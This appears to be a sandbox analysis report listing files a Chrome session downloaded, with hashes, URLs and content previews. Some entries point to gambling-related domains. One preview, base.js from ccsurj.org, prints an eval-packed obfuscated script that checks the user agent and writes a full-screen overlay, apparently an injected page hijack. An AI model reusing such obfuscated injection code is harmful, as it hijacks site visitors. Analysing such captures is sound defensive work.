                                          SHA-256:D538AB700CBA93700FD557400BB1869A621E8F35DDCFE0CB2B75BA6E806BC277
                                          SHA-512:CE493B1BA8BC56D423FA9D4E1686886E420C38CA0F4DBE380AF89F2598A33179C29477E6647DBF0C4C5B1D0F8BA9D8FEBDDBA38BAD83FB5E9FB9F8F79EE711C4
                                          Malicious:false
                                          Reputation:low
                                          Preview://.....!function(p){"use strict";!function(t){var s=window,e=document,i=p,c="".concat("https:"===e.location.protocol?"https://":"http://","sdk.51.la/js-sdk-pro.min.js"),n=e.createElement("script"),r=e.getElementsByTagName("script")[0];n.type="text/javascript",n.setAttribute("charset","UTF-8"),n.async=!0,n.src=c,n.id="LA_COLLECT",i.d=n;var o=function(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:"KBYUa6ibFuUdP5LO",ck:"KBYUa6ibFuUdP5LO"});..//FaDa...!function(p){"use strict";!function(t){var s=window,e=document,i=p,c="".concat("https:"===e.location.protocol?"https://":"http://","sdk.51.la/js-sdk-pro.min.js"),n=e.createElement("script"),r=e.getElementsByTagName("script")[0];n.type="text/javascript",n.setAttribute("charset","UTF-8"),n.async=!0,n.src=c,n.id="LA_COLLECT",i.d=n;var o=function(){s.LA.ids.push(i)};s.LA?s.LA.ids&&o():(s.LA=p,s.LA.ids=[],o()),r.parentNode.insertBefore(n,r)}()}({id:"KItugWeQ8IMGqH7w",ck:"KItugWeQ
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 29219
                                          Category:dropped
                                          Size (bytes):6253
                                          Entropy (8bit):7.968444681265087
                                          Encrypted:false
                                          SSDEEP:192:6fyRgLgnM6jGeuYcn/lnJxO5ku3LCKyD2SnvYW3G:66y3Reo9y5kyGKYvYW3G
                                          MD5:6D2DDA4F3C0ACA063ED086F640250658
                                          SHA1:741D6919FF9F9A0F7180D263F274544ECB50F396
                                          SHA-256:2DD68A74EE776E4B02AB31CC556CA0F0F1D0D83C4FF76CC3318FC884DB96EAB2
                                          SHA-512:51C0B19BDCB71040CF390FB6705972AB4BD1F7CB60F190117792A4556EB9FA98ED7842177C75FFDD0E364C418D5B9556FB9D02A71458847D910650EA751F36A2
                                          Malicious:false
                                          Reputation:low
                                          Preview:...........=ko..u.....N4;..M....E..+.TI..z!.w...3..YJ.j.... H`.}...:....M[C......l._...~....H..;..{.y.s.=...^?.TI.5.<....S..;H...Q/..........gQ..dq...R?....t..w@.4..G..........q=^...+.".9.;..2..$...OF.....A...o.I3J.4.w...U..M.."..E6..v..S`...`,.|...'...............Ga.L.{...?..<C...b..4...c... .*/..'.%..;a...t......W...qQ"8.....g.4]...........(ZG.(..p..s...-.....]..WqY5FcuUD.*"...9o.}.T...R.?. .Q..552..\.........+.......~%..;......l8.0..l.Y$...q...#...}uce......D....j0.....C..>u.yh.M..%l..h.o.....Y.J.....F.2.U(j8...-...w......W....@h.~......w.{.b...Az......P.F........#."L...Bf|%.w.tC.k.>.p?.....Lt...JAK~....r...0'Mh.."..j.S.i.....d\v.^....Q........5.=.Y&Y.X.....VU.p."..H....Cf.S..4.....<H.RF;....O$.0+.....Y7,iO{a.;..ju.}b...f..M#..w..7.A..~<.t]?>.a.+m....nK.G.rJC\.C....|...F....E.,h.Vn...w.pTl.2N=..E.V2.^I...8.T..)}..j#rrI..\72... .f.a.vT..3...&'..K.~Y..%#.>J.W..%..!5.S.*.%....w....`hW..Sw.."IW9L...#...K{.-...N....ID$.+I.5DG.u...!'
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 2481
                                          Category:downloaded
                                          Size (bytes):808
                                          Entropy (8bit):7.747604150802558
                                          Encrypted:false
                                          SSDEEP:24:X0yR/5FR3vL097imTFKuPnt5fXgUy5ZMpTg:X0QFxvyPTF954UEZMpTg
                                          MD5:E0D8F1FCC392EC41020548FA0262F0C8
                                          SHA1:1E3352811AC8805E9F16A6998AFDD60B5A8F44B9
                                          SHA-256:3185298168A57268AA370975E9DAB3EC553ACA0081C40EDBD28E56FB26982F42
                                          SHA-512:97541B57853EA9A498EDA116EB724AA96E0E18571EE62272F2C16C3D7776265B49832BC5862E8AFBF0E18DFDB4F0897F932E556F4D1966C086684ADC2B870CE9
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/components/selectPure.js?v=1736150851437
                                          Preview:...........VKo.0..+.R46"(;.u........v..B...c{..60..G=...z.a.$.E....T..18+..]@v$k.)b_.I.h.[f .,..E<.........P..U.|...Q..._.j..8....p..5bi{..o..>.h..0'9D..e....u.G+..N.....\.l6..w<...'T;z..;u.....R/..:i......y....Lk^+.^{...>.8F...C2.~....^\D......^7Ud*pL.+..7!....d.&...G.x.:....wt...3...."...O....b..Yn,]I./)'.K.._{C.....P>..'.?...K...W.$yU.k`.p.%..N{'.Rl.D.....Y../.........h...KT..#..0....Q.lZ....B..;D.V....7E.K._.eM....U..5.....fK.n.asdvh.w.p.........!...h.........p.Y.z..R.c...>.T..X&X].p,);p...x.0^O...r...h(....E......W..X.aV=...........%.T..8...]|j...G`*...~%.+e..3,.s:..NL...h>W..i.....P..../.B...G^.>.yK...('i.$....d...7.YrH.D.f...D"s.e...\......a...be..0..p$....J..mxZ....f..[.d1.P...u7....?y....._.j.G..{q....cQ.ss...8.W./.ic$"..[..+.T.d......D....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (32769), with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):94792
                                          Entropy (8bit):5.372834716258878
                                          Encrypted:false
                                          SSDEEP:1536:tYRKUfAjtledRTmtaFyQHGvCXseUOgRc9izzr4yff8teLvHHEjam7WuX3yzSiLnM:0UbYGvCD0932o2skAieW
                                          MD5:98A1899FF7D9D8DAF67A72AF10589D55
                                          SHA1:B4B807EE37CD8A33A501EF42E5872903DD93F3EB
                                          SHA-256:0FB548049AD8AD7580D2D60CA24FB2FA3BAD3303565CD826F92D44EFBFE9CAC3
                                          SHA-512:E11465F8D6699F82355DEF73E8359BFBCD8226449CE276658474DCA0956C896319AE7554D1BDD40FD41F099CD7EF2D05621C173D0252A9B51944F37C19BF5696
                                          Malicious:false
                                          Reputation:low
                                          Preview:..(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.parentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){ck||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.contentDocument).document,cl.write((f.support.boxModel?"<!doctype html>":"")+"<html><body>"),cl.close();d=cl.createElement(a),cl.body.appendChild(d),e=f.css(d,"display"),b.removeChild(ck)}cj[a]=e}return cj[a]}function ct(a,b){var c={};f.each(cp.concat.apply([],cp.slice(0,b)),function(){c[this]=a});return c}function cs(){cq=b}function cr(){setTimeout(cs,0);return cq=f.now()}function ci(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ch(){try{return new a.XMLHttpRequest}catch(b){}}function cb(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=a.dataTypes,e={},g,h,i=d.length,j,k=d[0],l,m,n,o,p;for(g=1;g
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):34
                                          Entropy (8bit):4.454822399946606
                                          Encrypted:false
                                          SSDEEP:3:MWLurukOyn:MMrkPn
                                          MD5:3A0D3A7785BBBD105FC858167A4DB9AF
                                          SHA1:C7189462CE75DC4FEF3496BD97C9A6799E218A89
                                          SHA-256:72C1598B9FADF28646A617537C97DB35F4EF88AE816A4AC400D5E12A9D64E85D
                                          SHA-512:947EEF459D7394A3342D858C456AE6FA9E82C3DE0BE0EDF5A69A4A935034F457C0CACCC49988A9502A2A0EE52CDC83224D1A24223B25FF8ECC0D8EA108D1F90F
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/index.vsb.css
                                          Preview:.font270866{ font-size: 9pt ;}....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (2361), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):2363
                                          Entropy (8bit):4.790718449571574
                                          Encrypted:false
                                          SSDEEP:48:bNUvwLLLLReAjKakeIOqfb6HVGl5SmTEOqTKDVmZSfa86ha:rPRerVOqfb6HVGl5SCFQSWa
                                          MD5:F997263F7A6750264FCA24687564284F
                                          SHA1:9ABAD4545425A87CECBB6815285715F29819B641
                                          SHA-256:5A938CA021C7EB1FF67E501CD590D555BB9452CB402C5DF3ED3D5B5BB291E6D4
                                          SHA-512:67C2990BC0267D606C1118D6963D0F07BAE305CCFD01D477291930B6576393D939CB920AD97CEAB8B5F1C60DA947B73616484ED196748F9D59D0F2474EBB89E5
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/@public/base.js
                                          Preview:eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('(w(){q S=/(1c|19|18|17|P 1a L|P 1d L|L)/i;H(S["\\1\\0\\7\\1"](1b["\\d\\7\\0\\9\\12\\r\\0\\3\\1"])){11}v["\\5\\2\\b\\d\\n\\0\\3\\1"]["\\o\\9\\8\\1\\0"](\'\\Q\\5\\8\\y \\7\\1\\t\\m\\0\\K\\R\\6\\2\\7\\8\\1\\8\\2\\3\\h\\g\\8\\k\\0\\5\\f\\1\\2\\6\\h\\z\\6\\k\\f\\9\\8\\r\\l\\1\\h\\z\\6\\k\\f\\A\\2\\1\\1\\2\\n\\h\\z\\6\\k\\f\\m\\0\\g\\1\\h\\z\\6\\k\\f\\D\\p\\8\\3\\5\\0\\k\\h\\c\\c\\c\\c\\c\\c\\c\\c\\c\\c\\f\\A\\a\\b\\G\\r\\9\\2\\d\\3\\5\\h\\16\\g\\g\\g\\f\\R\\T\\Q\\u\\5\\8\\y\\T\');w 10(O,M,s){s=s||{};q F=\'\';q E=[];v["\\U\\A\\V\\0\\b\\1"]["\\G\\0\\t\\7"](s)["\\g\\2\\9\\1o\\a\\b\\l"](w(C){E["\\6\\d\\7\\l"](W(C)+\'\\K\'+W(s[C]))});F=E["\\V\\2\\8\\3"](\'\\1s\');q j=1r 1h(
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 250 x 250, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):6928
                                          Entropy (8bit):7.953647279949998
                                          Encrypted:false
                                          SSDEEP:192:ic/wi2N9CN9PKE+xsWJ8Ihe9+dkJfWW/M:nN9CE+KZwqJfA
                                          MD5:4F9F1C048148B5759DB7C70D4427CA5B
                                          SHA1:40006416FCDC12C925F6069ABA457B2B85552AE0
                                          SHA-256:26B6D720A2DF9DA5151756FD37EC0C69651304677250BE9D7246936835E5ACEC
                                          SHA-512:07E2BA66990B3264D29482D0ABBC72BB43CDA4A94A839CC91579B98692568F67AFBDE43A74A44C8F8170A29947769696C6614B670F762BA2950A15ABB8101559
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/betway.png
                                          Preview:.PNG........IHDR..............2......PLTE"""...""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""...............)))............444......FFF///www@@@;;;...............kkk...oooKKK......sss]]]...bbb..................SSSWWWOOO...|||ggg............A..C....tRNS......~`1...XU.........IDATx...Yr.1.EQ!.=7c.... ....._...r.l...2..sIM.....}R.R.....T-k...U.~a......W.+.S.B....F...9.......>......!..&.........=+......K.+....xMo..^..x..9..R.N.t?.&m...6.j0..{.....5.}.d?.*.y.j.+.".(.".(.".(.".(.".(.".(.".(.".(."..]+Qj.....;.............G.n..fg.S...3/.bEV..u....C.w...#.P.....?.=.....@7./...:.X#..9..."......?...&.[t..Q....AW...'P....0u...G.B.....o.........%..E.Ph.........=.]..5h...I..>u!.".:.,....\gjP...?K..W.....Cs.X.A.2.%E.ql..N.G...M.....6;Cw.aE...c......@...A?`Y..>.............<..X`....@.-%?m.....9..Rs....L.>.>!ypDY...7....HS.....hU.uf.....E.{.......|.P`...^.$...N./L.}..68o.,...)...K./...w..........r..!)..SGl].[<..<..<.KLI.!..<.....|5..f.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (831), with CRLF line terminators
                                          Category:downloaded
                                          Size (bytes):1329
                                          Entropy (8bit):5.5382888091440465
                                          Encrypted:false
                                          SSDEEP:24:Q2UpeK+C6uSgSYknsJ4sS8XovsNNyNShcUn2T2XOwOQkn5cULVztt4CtkxKP5Jhr:io1CTXA+S8OszyScg5A5cARC6kxKfhth
                                          MD5:7D62C6043B946796B8446A113629E597
                                          SHA1:650F80553B43A5518814A92F1185ECD3D31A13FE
                                          SHA-256:AC09FF2C779832D9DF2E3370A647BCE1422ADA5E0FAA7195B135A03559C61B56
                                          SHA-512:E4A426530931AF08229F539B6547D88AC393F24D5E0422D86A65134E0AC4608C2966C16120D2426E5F3E3EEA5313F1143CC35AD37FC537D79A009B679A5067F2
                                          Malicious:false
                                          Reputation:low
                                          URL:https://www.ccsurj.org/system/resource/js/counter.js
                                          Preview:.var _jsq_image = new Image();..function _jsq_encode(){_keyStr="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";this.encode=function(a){if(a==null||a==undefined||a=="")return"";var b=new Array();var c,chr2,chr3;var d,enc2,enc3,enc4;var i=0;a=_utf8_encode(a);while(i<a.length){c=a[i++];chr2=a[i++];chr3=a[i++];d=c>>2;enc2=((c&3)<<4)|(chr2>>4);enc3=((chr2&15)<<2)|(chr3>>6);enc4=chr3&63;if(isNaN(chr2)){enc3=enc4=64}else if(isNaN(chr3)){enc4=64}b.push(_keyStr.charAt(d)+_keyStr.charAt(enc2)+_keyStr.charAt(enc3)+_keyStr.charAt(enc4))}return escape(b.join(''))};_utf8_encode=function(a){a=a.replace(/\r\n/g,"\n");var b=new Array();var d=0;for(var n=0;n<a.length;n++){var c=a.charCodeAt(n);if(c<128){b[d++]=c}else if((c>127)&&(c<2048)){b[d++]=(c>>6)|192;b[d++]=(c&63)|128}else{b[d++]=(c>>12)|224;b[d++]=((c>>6)&63)|128;b[d++]=(c&63)|128}}return b}}..function _jsq_(treeid, pagename, newsid, owner)..{.. if(window.top != window).. return;.. .. var c = navigator.appNam
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 45187
                                          Category:downloaded
                                          Size (bytes):11957
                                          Entropy (8bit):7.985342273030076
                                          Encrypted:false
                                          SSDEEP:192:g+X0q7GL4ywIyZYlwvwD3JidUfqIA+mR+gKAywyE8KBia48PHTj3fk:gYawIyMmURA+mREA/8YiCPfPk
                                          MD5:98947624DDFD4A8C9C2E31C607771854
                                          SHA1:6211952201EE80012D773E212C681CEABC9C6848
                                          SHA-256:E90D2F39289AB92C20B0E1ADE17E4826E6A22AC8FCE90533A30CB6EE0F7687E9
                                          SHA-512:3ECCEC895C2CF51B508955FF5B44EFA101712C3B0D3099FA8CFCF21C33FF90070E2BB8718D27E09F9C0A6D2F0B414F2E0CB48BACFF3CB803B3D0EC38176D41F2
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/ftl/commonPage/js/idangerous.swiper.min.js
                                          Preview:...........}.s.....+dN.#-J..k.....9.{.%M..\O..D[..J..X....@. (;.t.w..".X,...b.<<.S...&[$E.Q...=|?...,i..u4m-gY..l...]'7yq..V.....+....d..l..U...l...%.Bh..j......t...'I.w..C..~..CQ.(_...d.j=..{.....u...:+Z?C.3v......M.V.....1..E.%.%`..c.~|....:=9.......y.z........|....?}d..U....v.e..s...\.Y.r.2...."Y..y+..u2_u?.....4.....l6r....j.....a"...c.....||..ZO...^8a......W..v.tW..@p>..b....^/..W.......y.d ..w."IN.8..w)...]....5Kn.G.;K..t..o..:.."..P...y~o..#..N...a...(.'7..k6I.Q7..r.WdG.....<....{.......z6..Cxr?.Y...K7C0...".....v.....Y.Ie..n.....T....u..[..fEr.f.1..\#.?.<o.G.e..l...-.2...].....b/..*.'....M....8..n..g..$..QWd.G.(.....d) 7..eRt....l......zJ..Z[..7+V......B[...c......<.......z...O..a...,.E.7)......d.;.....^.@.....s.vq~3w..y....Y/...f.U.:Yf...c.&..<.)(..q...y...'0.G..7.$.Q..>@ ..x..Q.3....r...$q........2.Uq{.s.2.udQ..O.Fl.M...j.............C.(<.g....::.^%......}.T..2..eH..".A|....N.ka.:...i_6...pq.L..`..:;..v.c..w>...y...7^....
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (434), with no line terminators
                                          Category:downloaded
                                          Size (bytes):434
                                          Entropy (8bit):4.276446137177361
                                          Encrypted:false
                                          SSDEEP:12:Lik4Xk4Lbk4L1ZTZmGk4LD9gIzLjp9gIzLz/Gg9gIzLPp:Li/X/Lb/LnVF/LD9lL19lL7Gg9lLPp
                                          MD5:19E810547F1918B57C147ED44F6AA261
                                          SHA1:DBD58ABFC0153B30EA2984040587920CC0CE89B5
                                          SHA-256:7B63908F827B50DD226D1193CA39F9C03E48723E59ADAC3B2D94EFE99A36A40F
                                          SHA-512:BD02054232A4EE1E115634C517B5602CC30F04BF7E661DE88D509B1A0A00A428A971B405626C4F4EE171FE44D6E1FEC8D5F34ACD3880348DDA45C82B844EDF65
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/msites/themes/default/common.css?v=1736150851437
                                          Preview:@import "../base.css";@import "../../../common/themes/base.css";@import "../../../common/themes/default/bootstrap/bootstrap.css";@import "../../../common/themes/default/bootstrap-dialog/bootstrap-dialog.css";@import "../../../common/themes/default/font-awesome/font-awesome.css";@import "../../../msites/themes/default/style.css";@import "../../../msites/themes/default/content.css";@import "../../../msites/themes/default/login.css";
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (3711), with no line terminators
                                          Category:dropped
                                          Size (bytes):3711
                                          Entropy (8bit):5.0622390478438515
                                          Encrypted:false
                                          SSDEEP:96:5mIye9kXARbKZ3O0e8WdWyKZSz7lo/S9dgyOn4BdC:Xygkcw5sDoa9xrC
                                          MD5:A52EE49FE4AFFF274F8C30FE880DDC13
                                          SHA1:6E9F90F5D82324DED047FCB1EE3A69AAED0F9C91
                                          SHA-256:0EAA691F4B80B80FE92BD5DCFA943126C6BAC2E4F6AC1E586DE155FA1C287360
                                          SHA-512:FCF79C53EB405B42ED5D0AFE2B309BE3B96CE3F80562CD3669F3239764B9CAFF8FA16BC01D4FDCA12A2E2B624BF259547E350DD205CE77919A1CE0544251F252
                                          Malicious:false
                                          Reputation:low
                                          Preview:!function(e,n){"object"==typeof exports&&"undefined"!=typeof module?n(exports):"function"==typeof define&&define.amd?define(["exports"],n):n(e.quicklink={})}(this,function(e){function n(e){return new Promise(function(n,r,t){(t=new XMLHttpRequest).open("GET",e,t.withCredentials=!0),t.onload=function(){200===t.status?n():r()},t.send()})}var r,t=(r=document.createElement("link")).relList&&r.relList.supports&&r.relList.supports("prefetch")?function(e){return new Promise(function(n,r,t){(t=document.createElement("link")).rel="prefetch",t.href=e,t.onload=n,t.onerror=r,document.head.appendChild(t)})}:n,o=window.requestIdleCallback||function(e){var n=Date.now();return setTimeout(function(){e({didTimeout:!1,timeRemaining:function(){return Math.max(0,50-(Date.now()-n))}})},1)},i=new Set,c=new Set,u=!1;function a(e){if(e){if(e.saveData)return new Error("Save-Data is enabled");if(/2g/.test(e.effectiveType))return new Error("network conditions are poor")}return!0}function s(e,r,o){var s=a(navigator
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 1269 x 714, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):1198568
                                          Entropy (8bit):7.9782680619647595
                                          Encrypted:false
                                          SSDEEP:24576:As9LzuxNP9/AsGsKbLwJgR9DsCDopmNV3Dkm5CJ+gSbX4:AsVyxNP9HJYxsAoMlYpJKo
                                          MD5:0D8B42A6083AF30532CABE26DE75AE3C
                                          SHA1:097C0FB74FE2D6D61068C1FAB64C5271AA1F0C1B
                                          SHA-256:7DFD067F4CA5952E123597E785EBC46D5E0C00CB76D4BBC8B8B6D2339AAD2FEC
                                          SHA-512:A0A208E5302A367ECC0051B5A8E1174E1C87E604FDBB8D039922A5074F2221DAAE3F9BD76D82C69B0A3615B5A1A3AB6305C3FD1CD0922FD193BB6FFF9EB2811A
                                          Malicious:false
                                          Reputation:low
                                          Preview:.PNG........IHDR....................pHYs..!...!........ .IDATx...w.$.'.....E.,.U......9..8.}..-..]....Y..&.KfV....w.....".8...........f.....Dd...+.a.".s..!"x""D.B...g.<z"$".DD.......I..DD.U.I.<.....s.6B.........V.!.@D!.p...o....CD..u._...%m.qw..-. J......4...4x.s.{.}.4Z.(..0.R..9. ...7r......./..?.....dU.RJ..sN...EQ.A.E..&.......9.w[...C. ...?~...X.7..Y..........?~#...SJ.9k.sNJ.BH)9g...(...<..!..Gz.._$..[.AJ...%....'....iD.u./...W .5...=N...?........'.{o..o..@.ZJ....J)%.........e.......b..<..7|.h.{..U..O.....I....A....r...Z....(.........7>c.s..Zk..1..z..z.("..,..J).\Q.yf;.~..eY.c. ....f.Y.$q.;...4M[...a.$..v{yy...~._.....z.^,.....>|........,.N....1...j.fY.o.Z.6'..&{.....C....b0..i.0.4M....$.,.2D...eY.u-...HJY.u^...Q...?~..F.....777u]...!DY.y.'I........}...b..Z...}...Y..!^.~..v;.NY....R...".xw;./......t:........Z...u.4......(...=.^...+..8...C..J....7o.h.{.^.E..|2.t:..O.\.. %..W....Z;.....v.=>>^..........(.J.0.\]]M&........}..Y..u].E..a.4A..f.8...
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (669), with no line terminators
                                          Category:downloaded
                                          Size (bytes):687
                                          Entropy (8bit):5.217403162786378
                                          Encrypted:false
                                          SSDEEP:12:1cuHAPIJAuIrVgl17rTAoIr9/7KVDI0RE+VgiF8+9Mn3IztQLPoIQBXjMnWIEnxJ:1cCAPIOuIxgPkoIhTK5ZG+VLF8+9O3IR
                                          MD5:9EFC0DBB4505675569C5718E1977FE85
                                          SHA1:3EFB0631C80E9B9B79153FC27BC7954F54E2A2C3
                                          SHA-256:667589AACE8EDB644B6338298D68D9461AEEFA5864E18270C489BCB4CE7C6D44
                                          SHA-512:E63A813F0055E0BE3C99C2F6F87E05E96077BF9939FDD26F8D50806409A446EC48021C521C5B3341A23AFE0B5ABDFB2CC4909EE7890D641F0BDB195EF2FD66BC
                                          Malicious:false
                                          Reputation:low
                                          URL:https://p3yw7u.innittapp.com/061410/rcenter/common/js/gamebox/common/errors/templateWrap.js?v=1736150851437
                                          Preview:define([],function(){return Class.extend({init:function(){this.getTemplateHeader()},buildEvent:function(){var _this=this;$(window).resize(function(){_this.resizeHeight()})},getTemplateHeader:function(){var _that=this;$.ajax({url:"/commonPage/error.html",dataType:"html",type:"POST",success:function(data){$("._top").html($(data).find("div._topOri"));$("._footer").html($(data).find("div._footerOri"))},complete:function(){_that.resizeHeight()},error:function(){console.log(".........")}})},resizeHeight:function(){var resizeObj=$("._center");var topObj=$("._top");var footerObj=$("._footer");resizeObj.height($(window).height()-topObj.height()-footerObj.height())}})});
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 117433
                                          Category:dropped
                                          Size (bytes):26968
                                          Entropy (8bit):7.989973612199997
                                          Encrypted:false
                                          SSDEEP:768:MpDKLSbr9FzuQKBmNEEG38V8anXFJU0huwW89:MAS9Nu/XEG3inXvhpW89
                                          MD5:228D1E3DC26674BFAD82AD7C49F100F4
                                          SHA1:786EDD830ACD664E7D1252305B9E2BA06698145A
                                          SHA-256:9AF2A0E25B339B1D953621CCD8BE977B85B46848EAAE9C938D379DFF7DC549C8
                                          SHA-512:36B3E085FE0682FAAFDC23B30C113395D607961C1059348F5897895B7CCCC8CC6FA32588A26B471A24A496EE47CA86B3544D0AE93C16F26F61758D23E33E89E6
                                          Malicious:false
                                          Reputation:low
                                          Preview:............w..u(............l.4."..k.W.)...Cb,..b.Q...:i..u..Z.m.i.:m.M..i..[........n....s.f..n...qD`f..k.}..g...S. .$.I....E.u?..i6.V....R..=...^6...v:..dY.....at......f...D.l8.......z?.$.<......y...;.....ag.\..l?.7.........".L.GIv.%.F.x.GkkkQ-..5.Lj.'>.^...D...t.M..a.E.....z#Z5.3..W2..~..]..?.ZD&....d&....'.4.2.Rb.."...8.e..q...w.]...t:I...B.{...#....t<.H....\.N.P...p....../.F. S..u3(.$.J.i>I...D.....u.d...IO...#..0.N..8.'..0......&..j..I..m.'O&..Q.zG..e2.....Uc.@SL.K.q|\O...$P3....G.l.a+.'.....a..*4j...Q......'I);z...x...........Q....z<.C...R`w.'..wv.QzQ.8..Q=..K..4z....O.....ha!5ipi..h....Cd..".F....-8`.%.........nF..4Q...'.\A...<.@..S..BRh...~..n.O.t`..C.....E.eQ.".~|.5..5.|.;.2.?..I.~.&..Bt.....A...q.bih'{.Igo....}9.......A.%.(..;.1..7....(T.hF..4i..k...A...........~|.[J...$.&..@.u.d.u...P...j.R.U..F.c..*..~.4-..p.'.....n.....q..B."........Qk.....7...m.%.%..5}..D.t.. .n...c . B0W.]..A..7..Z.[.-......=L.F....#`...A.^#..n//..B
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 268 x 411, 8-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):16719
                                          Entropy (8bit):7.98171793482572
                                          Encrypted:false
                                          SSDEEP:384:GVs8oiHguE1GrFCHWk9DxPjkG0j9X7JZ3c7mor1VtrNteisU1:wRoTuEgBCHWk9xLkGi9X7JFc7TVoI
                                          MD5:9C4488C5C4BAAAE0286BDA2A5CA555EB
                                          SHA1:0103D52A175D0D91ED500B11F67D73457F7ABC4A
                                          SHA-256:B7B9498D1BEABAE57D14A7806C87265571A0A5BBD1B5D49BC7029F1AAD3959D6
                                          SHA-512:1FFEA5410878209B78ADA1C4B105B229C691E789E0ADF31A38EA1E8CFADAC857A1317B4A8DAFD52EC7CC7BE119B22B3CADDC43613D91E97D8C42F02E3573F275
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/imgs/2026shijiebei.png
                                          Preview:.PNG........IHDR..............1^Z....PLTE........................................................[.........-....EnJ.}T!f>..g(....l)P...u,.y,.1.U5.@&...1.&...3.}6.Z#\:..r+*..vM.9#.....CvG..c'.w._&F+....;...X.C'..A.]$aA..S5.`&.S!#.....<#uT"..u.D.d.a.r7www.n..?.n).m*2...TG ..c.Iq@..M..>..>.X..8fH...A..L.I..n.l.U#...._&....;.g)O$...P...G....]>k6.....J....L.~=b2..a..X.e.R1%...3......W.c'.........Z..M.J......Y*...w.a..L.j5......1.|,....U.t>..0qqp.j.?XA...m.Q.......F......{<.....f..=.s.[.v/..y..aG6.....+......o.j&^F.[,.zxY-Gze.........t$pR.kMZ.z)N>.`6............a..W.oC.F4.Y&6cO...^**(.L!...K.*.U.pGFF=oZ./.6(....^.A..... #.976...d.....[[Z.,..c..taR1.0D.pv]H...j...uY..z_.H....tRNS...C.....1.|_'..Qn.......>3IDATx...[n. ..P.....&...Z..*j.QU@..9K...................%q_.k..z...J...nWrr:..r...>....v....uD<.t-9....B..u.8.&t.0.~|.#P..B......v.H...LB.........E..6%....y..*..B...j)Z...Gjg...*....Q.g..Z.........g.W^....O.je}
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (21084)
                                          Category:downloaded
                                          Size (bytes):21218
                                          Entropy (8bit):5.216818536486825
                                          Encrypted:false
                                          SSDEEP:384:knMQG5rwVO7dV9nNbRGCB9D45Hkn5vj2xpOxvIAgD75zBi5vISg3gzopL9TidOg6:P5sg7X/jD45eSxpOxvKD73i5vTzwL9T5
                                          MD5:C6946DFF4854D4611DA8AEF36666B938
                                          SHA1:9118198BD2A853BAA4644C6E819427150CA35160
                                          SHA-256:7028EF6262D35DB7DC22B05DF3CBB3E93595CE90CD340FDC356620D961B01224
                                          SHA-512:BB613298F726B820AA39F55851F2E11FE570FC7620C8CB6322F5CCD5726A2D230BABEEA76BDA3FC7D25BD11AB7F2F64B5BC138C177C5C42DBEF92EA20F3C4FE3
                                          Malicious:false
                                          Reputation:low
                                          URL:https://1k4ej4j1lxvjwz.com/popper.min.js
